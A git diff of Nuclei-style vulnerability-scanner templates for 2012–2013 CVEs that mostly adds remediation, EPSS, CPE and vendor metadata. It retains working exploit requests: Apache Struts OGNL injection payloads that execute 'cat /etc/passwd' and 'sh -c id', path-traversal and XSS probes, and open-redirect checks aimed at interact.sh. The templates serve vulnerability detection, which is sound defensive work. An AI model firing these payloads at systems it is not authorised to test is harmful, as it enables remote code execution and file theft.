b/http/cves/2012/CVE-2012-4273.yaml index cddc71017b..96721203a6 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -5,18 +5,26 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + remediation: | + Update to the latest version of the 2 Click Socialmedia Buttons plugin (0.34 or higher) to fix the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4273 - http://plugins.trac.wordpress.org/changeset?old_path=%2F2-click-socialmedia-buttons&old=532798&new_path=%2F2-click-socialmedia-buttons&new=532798 - http://wordpress.org/extend/plugins/2-click-socialmedia-buttons/changelog/ - http://packetstormsecurity.org/files/112615/WordPress-2-Click-Socialmedia-Buttons-Cross-Site-Scripting.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/75518 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4273 cwe-id: CWE-79 + epss-score: 0.00252 + epss-percentile: 0.62882 + cpe: cpe:2.3:a:ppfeufer:2-click-social-media-buttons:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: ppfeufer + product: 2-click-social-media-buttons google-query: inurl:"/wp-content/plugins/2-click-socialmedia-buttons" tags: cve,cve2012,wordpress,xss,wp-plugin,packetstorm @@ -28,9 +36,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -41,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4b0a004830460221008d9f4bae75efece65b9088bfdd99a8afa15bd4cffc6b1d709c73352c0473bd13022100941e64d8ab633df1673789dc074540bae6f2054c5da09752d2327a2563f64db3:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index 924249dee4..3e77178c50 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -10,14 +10,20 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 - http://awstats.sourceforge.net/docs/awstats_changelog.txt - http://openwall.com/lists/oss-security/2012/10/29/7 + - http://openwall.com/lists/oss-security/2012/10/26/1 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4547 cwe-id: CWE-79 - tags: cve,cve2012,xss,awstats,edb + epss-score: 0.0023 + epss-percentile: 0.61019 + cpe: cpe:2.3:a:laurent_destailleur:awstats:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: laurent_destailleur + product: awstats + tags: cve,cve2012,xss,awstats,edb http: - method: GET @@ -26,6 +32,7 @@ http: - '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E' stop-at-first-match: true + matchers-condition: and matchers: - type: word @@ -42,4 +49,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4b0a004830460221009b4c10e16fee7c93a6acff549819b1d7a693c438f9de6992271086a192f81d650221008ea6d8dde37d751e4acf1fa60c1a4a6bc341dd2b3d829f1f807bfa079968abb6:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 1a8efc1ba4..a55fdf6096 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -5,18 +5,27 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + remediation: | + Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-4768 - http://packetstormsecurity.org/files/116408/wpdownloadmonitor3357-xss.txt - http://www.reactionpenetrationtesting.co.uk/wordpress-download-monitor-xss.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/78422 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4768 cwe-id: CWE-79 - tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress + epss-score: 0.00922 + epss-percentile: 0.81173 + cpe: cpe:2.3:a:mikejolley:download_monitor:3.3.5.7:*:*:*:*:wordpress:*:* metadata: max-request: 1 + vendor: mikejolley + product: download_monitor + framework: wordpress + tags: xss,wp-plugin,packetstorm,cve,cve2012,wordpress http: - method: GET @@ -26,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -39,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a0047304502210085131c5e87ea4fc813646ad8a2c857977ad49b84c5d70492e2324b714cfc744b022069acefc380d77c270ce45626b88bda31f3f6762c2fb88a5345454e422cfd258c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index be7bb96ae8..68d966a0a9 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -3,21 +3,29 @@ id: CVE-2012-4878 info: name: FlatnuX CMS - Directory Traversal author: daffainfo - severity: high + severity: medium description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS. reference: - https://www.exploit-db.com/exploits/37034 - https://nvd.nist.gov/vuln/detail/CVE-2012-4878 - http://www.vulnerability-lab.com/get_content.php?id=487 - http://packetstormsecurity.org/files/111473/Flatnux-CMS-2011-08.09.2-CSRF-XSS-Directory-Traversal.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74568 classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:N/A:N cvss-score: 5 cve-id: CVE-2012-4878 cwe-id: CWE-22 - tags: cve2012,lfi,traversal,edb,packetstorm,cve + epss-score: 0.00954 + epss-percentile: 0.81522 + cpe: cpe:2.3:a:flatnux:flatnux:2011-08-09-2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: flatnux + product: flatnux + tags: cve2012,lfi,traversal,edb,packetstorm,cve http: - method: GET @@ -26,7 +34,6 @@ http: matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -35,4 +42,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4b0a00483046022100bb975bb8283c0b385016615dc2b9db4b83c713816c0e6e44de42680aa0c9d3d7022100a43720cf3abd6a8e50d1cbd2fa748bb7f0c501b7d48be22976647c131af039ad:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index 33488b6041..def71a07e2 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -5,19 +5,26 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. + remediation: | + Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer. reference: - - http://web.archive.org/web/20210121082432/https://www.securityfocus.com/bid/52841/info - https://nvd.nist.gov/vuln/detail/CVE-2012-4889 - http://packetstormsecurity.org/files/111474/VL-437.txt - http://www.vulnerability-lab.com/get_content.php?id=437 + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74538 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-4889 cwe-id: CWE-79 - tags: cve,cve2012,xss,manageengine,packetstorm + epss-score: 0.03526 + epss-percentile: 0.90507 + cpe: cpe:2.3:a:manageengine:firewall_analyzer:7.2:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: manageengine + product: firewall_analyzer + tags: cve,cve2012,xss,manageengine,packetstorm http: - method: GET @@ -27,9 +34,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - '' - part: body - type: word part: header @@ -40,4 +47,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a00473045022007945ad487c89dd54e8f134841d3ea3868604fe8662072923113592082f43fd9022100c7b3380ef304db0712af561d24d81e8a0459a1e0c8f371f711e1f1221354f212:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index edc6ce6601..d37365abc7 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -3,21 +3,27 @@ id: CVE-2012-4940 info: name: Axigen Mail Server Filename Directory Traversal author: dhiyaneshDk - severity: high + severity: medium description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. + remediation: | + Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Axigen Mail Server. reference: - https://www.exploit-db.com/exploits/37996 - https://nvd.nist.gov/vuln/detail/CVE-2012-4940 - http://www.kb.cert.org/vuls/id/586556 - - http://web.archive.org/web/20210121232008/https://www.securityfocus.com/bid/56343/ classification: cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:N + cvss-score: 6.4 cve-id: CVE-2012-4940 cwe-id: CWE-22 - cvss-score: 6.4 - tags: edb,cve,cve2012,axigen,lfi,mail + epss-score: 0.04527 + epss-percentile: 0.91545 + cpe: cpe:2.3:a:gecad:axigen_free_mail_server:-:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: gecad + product: axigen_free_mail_server + tags: edb,cve,cve2012,axigen,lfi,mail http: - method: GET @@ -35,4 +41,4 @@ http: - "extensions" condition: and -# Enhanced by cs on 2022/02/25 +# digest: 4a0a00473045022100bb0032522147c34cfc6a2daa0d996982cb745d398167fb6c314404c335542f7202206fa10c99cb452edf46236d2cec852180b0018c06996cbe9fb573b725fa620cdf:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 0352e782ec..fed33d0550 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -1,22 +1,30 @@ id: CVE-2012-4982 + info: name: Forescout CounterACT 6.3.4.1 - Open Redirect author: ctflearner severity: medium description: | Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter. + remediation: | + Apply the latest security patches or upgrade to a newer version of Forescout CounterACT to fix the open redirect vulnerability. reference: - https://www.exploit-db.com/exploits/38062 - https://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html - https://nvd.nist.gov/vuln/detail/CVE-2012-4982 + - http://www.reactionpenetrationtesting.co.uk/forescout-cross-site-redirection.html classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-4982 cwe-id: CWE-20 + epss-score: 0.00763 + epss-percentile: 0.79145 cpe: cpe:2.3:a:forescout:counteract:6.3.4.10:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: forescout + product: counteract tags: cve,cve2012,redirect,forescout,counteract http: @@ -29,3 +37,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# digest: 4b0a00483046022100a780391cdc672f4223dd342fe50b491b34586f2aad2efe777c4c1a6869bc8d73022100db537c9b2ba8b3c6a0b3c1c394d77b5ff42000bdf684cf1ceb7becbad4ad1732:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml new file mode 100644 index 0000000000..e0f4682b77 --- /dev/null +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -0,0 +1,42 @@ +id: CVE-2012-5321 + +info: + name: TikiWiki CMS Groupware v8.3 - Open Redirect + author: ctflearner + severity: medium + description: | + tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection + remediation: | + Apply the latest security patches or upgrade to a newer version of TikiWiki CMS Groupware to mitigate the risk of open redirect vulnerabilities. + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2012-5321 + - https://www.exploit-db.com/exploits/36848 + - http://st2tea.blogspot.com/2012/02/tiki-wiki-cms-groupware-frame-injection.html + - https://exchange.xforce.ibmcloud.com/vulnerabilities/73403 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 + cve-id: CVE-2012-5321 + cwe-id: CWE-20 + epss-score: 0.02634 + epss-percentile: 0.89181 + cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:8.3:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: tiki + product: tikiwiki_cms\/groupware + shodan-query: http.html:"tiki wiki" + tags: cve,cve2012,redirect,tikiwiki,groupware + +http: + - method: GET + path: + - "{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + +# digest: 490a00463044022063d70a349fa4e6f9e223a1dabe4b9ad5cdc266515a26e11f27dfc637e7f0fd39022001bb8b7ceaf7dcb8a07b5b4b28dd9c4fdb530c02cdb3985e6701cc256987d676:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 8b307eafa0..419f88db0e 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -5,19 +5,27 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. + remediation: | + Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2012-5913 - https://www.acunetix.com/vulnerabilities/web/wordpress-plugin-integrator-redirect_to-parameter-cross-site-scripting-1-32/ - http://packetstormsecurity.org/files/111249/WordPress-Integrator-1.32-Cross-Site-Scripting.html - http://www.darksecurity.de/advisories/2012/SSCHADV2012-010.txt + - https://exchange.xforce.ibmcloud.com/vulnerabilities/74475 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N cvss-score: 4.3 cve-id: CVE-2012-5913 cwe-id: CWE-79 - tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve + epss-score: 0.00828 + epss-percentile: 0.80061 + cpe: cpe:2.3:a:wordpress_integrator_project:wordpress_integrator:1.32:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: wordpress_integrator_project + product: wordpress_integrator + tags: cve2012,wordpress,xss,wp-plugin,packetstorm,cve http: - method: GET @@ -27,9 +35,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -40,4 +48,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 490a004630440220786249adcb4ce3e55d1ca6de3d33f6c8017121dd2f163e14a0b3bf83ffa1b93602202c7f56390d67f5075da2dda18ac5a6500833a8104c64cf1f8f72401fabb9eac0:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index 1b8e9b0ad9..f88fd837af 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -6,18 +6,24 @@ info: severity: medium description: | Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. + remediation: | + Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed. reference: - https://www.exploit-db.com/exploits/18350 - https://wordpress.org/plugins/age-verification - https://nvd.nist.gov/vuln/detail/CVE-2012-6499 classification: - cvss-metrics: AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N cvss-score: 5.8 cve-id: CVE-2012-6499 cwe-id: CWE-20 + epss-score: 0.01204 + epss-percentile: 0.83685 cpe: cpe:2.3:a:age_verification_project:age_verification:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: age_verification_project + product: age_verification tags: cve,cve2012,wordpress,wp,wp-plugin,redirect,age-verification http: @@ -33,3 +39,5 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' + +# digest: 490a0046304402200a35cd39c314fe6d16bfc240af25a1c950b066fbc707901cd7a6ee5c1ccd06d5022042ab78f8690f47843c1ffc4f896de1a89bac33831ef038c3d289e733102cb406:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index 35c1132f3e..0a2ef448e0 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -5,32 +5,38 @@ info: author: pikpikcu severity: critical description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. + remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. reference: - http://struts.apache.org/development/2.x/docs/s2-012.html - https://nvd.nist.gov/vuln/detail/CVE-2013-1965 - https://bugzilla.redhat.com/show_bug.cgi?id=967655 - remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C + cvss-score: 9.3 cve-id: CVE-2013-1965 cwe-id: CWE-94 - cvss-score: 9.3 - tags: cve,cve2013,apache,rce,struts,ognl + epss-score: 0.00813 + epss-percentile: 0.79885 + cpe: cpe:2.3:a:apache:struts:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2013,apache,rce,struts,ognl http: - method: POST path: - "{{BaseURL}}/user.action" - headers: - Content-Type: application/x-www-form-urlencoded + body: | name=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C+%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D + headers: + Content-Type: application/x-www-form-urlencoded + matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" @@ -39,4 +45,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a004730450220137dcf596b4a91b69be8d79f762dd1b3b1902d36f8fb40b3239d78f327a4613302210099fc96d3741b66a00f405ac5da30d20ed8d4ed2853ca7dfdcad6fa4010e24014:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index e7324e7981..64faa0cb0e 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -5,20 +5,26 @@ info: author: 0x_Akoko severity: medium description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. + remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. reference: - https://www.exploit-db.com/exploits/38666 - https://nvd.nist.gov/vuln/detail/CVE-2013-2248 - https://cwiki.apache.org/confluence/display/WW/S2-017 - http://struts.apache.org/release/2.3.x/docs/s2-017.html - remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. + - http://www.fujitsu.com/global/support/software/security/products-f/interstage-bpm-analytics-201301e.html classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cwe-id: CWE-601 + cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:N + cvss-score: 5.8 cve-id: CVE-2013-2248 - tags: cve,cve2013,apache,redirect,struts,edb + cwe-id: CWE-20 + epss-score: 0.97289 + epss-percentile: 0.99816 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: apache + product: struts + tags: cve,cve2013,apache,redirect,struts,edb http: - method: GET @@ -27,8 +33,8 @@ http: matchers: - type: regex + part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' - part: header -# Enhanced by mp on 2022/02/21 +# digest: 4b0a00483046022100a0b676658d7841dc57b41e45ad276dc8191e20b1db94205d0abb44b99b292e96022100ba3e1ad796df56fffd368503e3c365603554ae02ac62fad9f6b47deb6d4dee5c:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 48fceccf64..928f91bd6c 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -5,19 +5,26 @@ info: author: exploitation,dwisiswant0,alex severity: critical description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code. + remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. reference: - http://struts.apache.org/release/2.3.x/docs/s2-016.html - https://cwiki.apache.org/confluence/display/WW/S2-016 - https://nvd.nist.gov/vuln/detail/CVE-2013-2251 - remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. + - http://archiva.apache.org/security.html + - http://cxsecurity.com/issue/WLB-2014010087 classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:C/I:C/A:C cvss-score: 9.3 cve-id: CVE-2013-2251 cwe-id: CWE-20 - tags: cve,cve2013,rce,struts,apache,ognl,kev + epss-score: 0.97432 + epss-percentile: 0.99922 + cpe: cpe:2.3:a:apache:struts:2.0.0:*:*:*:*:*:*:* metadata: max-request: 9 + vendor: apache + product: struts + tags: cve,cve2013,rce,struts,apache,ognl,kev http: - raw: @@ -25,12 +32,10 @@ http: GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1 Host: {{Hostname}} Accept: */* - - | GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1 Host: {{Hostname}} @@ -44,15 +49,15 @@ http: matchers-condition: and matchers: - - type: status - condition: or - status: - - 200 - - 400 - - type: regex part: body regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# Enhanced by mp on 2022/02/21 + - type: status + status: + - 200 + - 400 + condition: or + +# digest: 4b0a00483046022100831f97e225071a17bd23c67a7b0cf8de2c53c98ffe16eeb293d1162ffdd9960d022100bd75a26ecbaafa9c9c7340bd4df5c6920ca29e6d8ba50e2e808775ef6a896a83:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index 66b2335ac3..660f754bc6 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -5,16 +5,23 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. + remediation: | + Update to the latest version of the WordPress Plugin Uploader or apply a patch provided by the vendor to fix the XSS vulnerability. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-2287 - https://www.dognaedis.com/vulns/DGS-SEC-16.html classification: cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N + cvss-score: 4.3 cve-id: CVE-2013-2287 cwe-id: CWE-79 - cvss-score: 4.3 + epss-score: 0.00219 + epss-percentile: 0.59693 + cpe: cpe:2.3:a:roberta_bramski:uploader:1.0.4:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: roberta_bramski + product: uploader google-query: inurl:"/wp-content/plugins/uploader" tags: cve,cve2013,wordpress,xss,wp-plugin @@ -26,9 +33,9 @@ http: matchers-condition: and matchers: - type: word + part: body words: - "" - part: body - type: word part: header @@ -39,4 +46,4 @@ http: status: - 200 -# Enhanced by mp on 2022/02/21 +# digest: 4a0a00473045022100df033bc107e6cf00ac0f6e4d868261fd8748d2a2a031d914fc0bbc72318cf858022065ebb0d332c58458303aef9c0d4c7e7af205dcd37f544455472f287e0fc6493b:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index ed6f87803b..bb71f86b57 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -1,10 +1,13 @@ id: CVE-2013-2621 + info: name: Telaen => v1.3.1 - Open Redirect author: ctflearner severity: medium description: | Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL. + remediation: | + Upgrade to the latest version of Telaen to fix the open redirect vulnerability. reference: - https://www.exploit-db.com/exploits/38546 - https://exchange.xforce.ibmcloud.com/vulnerabilities/84683 @@ -14,9 +17,13 @@ info: cvss-score: 6.1 cve-id: CVE-2013-2621 cwe-id: CWE-601 + epss-score: 0.03563 + epss-percentile: 0.90553 cpe: cpe:2.3:a:telaen_project:telaen:*:*:*:*:*:*:*:* metadata: max-request: 2 + vendor: telaen_project + product: telaen tags: cve,cve2012,telaen,redirect http: @@ -26,9 +33,12 @@ http: - "{{BaseURL}}/redir.php?https://interact.sh" stop-at-first-match: true + matchers-condition: and matchers: - type: regex part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' + +# digest: 490a00463044022056e8b56ab65e3b48d0538649c28fd47788e9bf9528c41329f4a452627dbab09102202e90f4be9a6af22d16c2ebdd26d956c06e749bd0e893b38ecd4f5545eae26a08:922c64590222798bb761d5b6d8e72950 diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index ecedabb218..8236c20767 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -5,17 +5,24 @@ info: author: 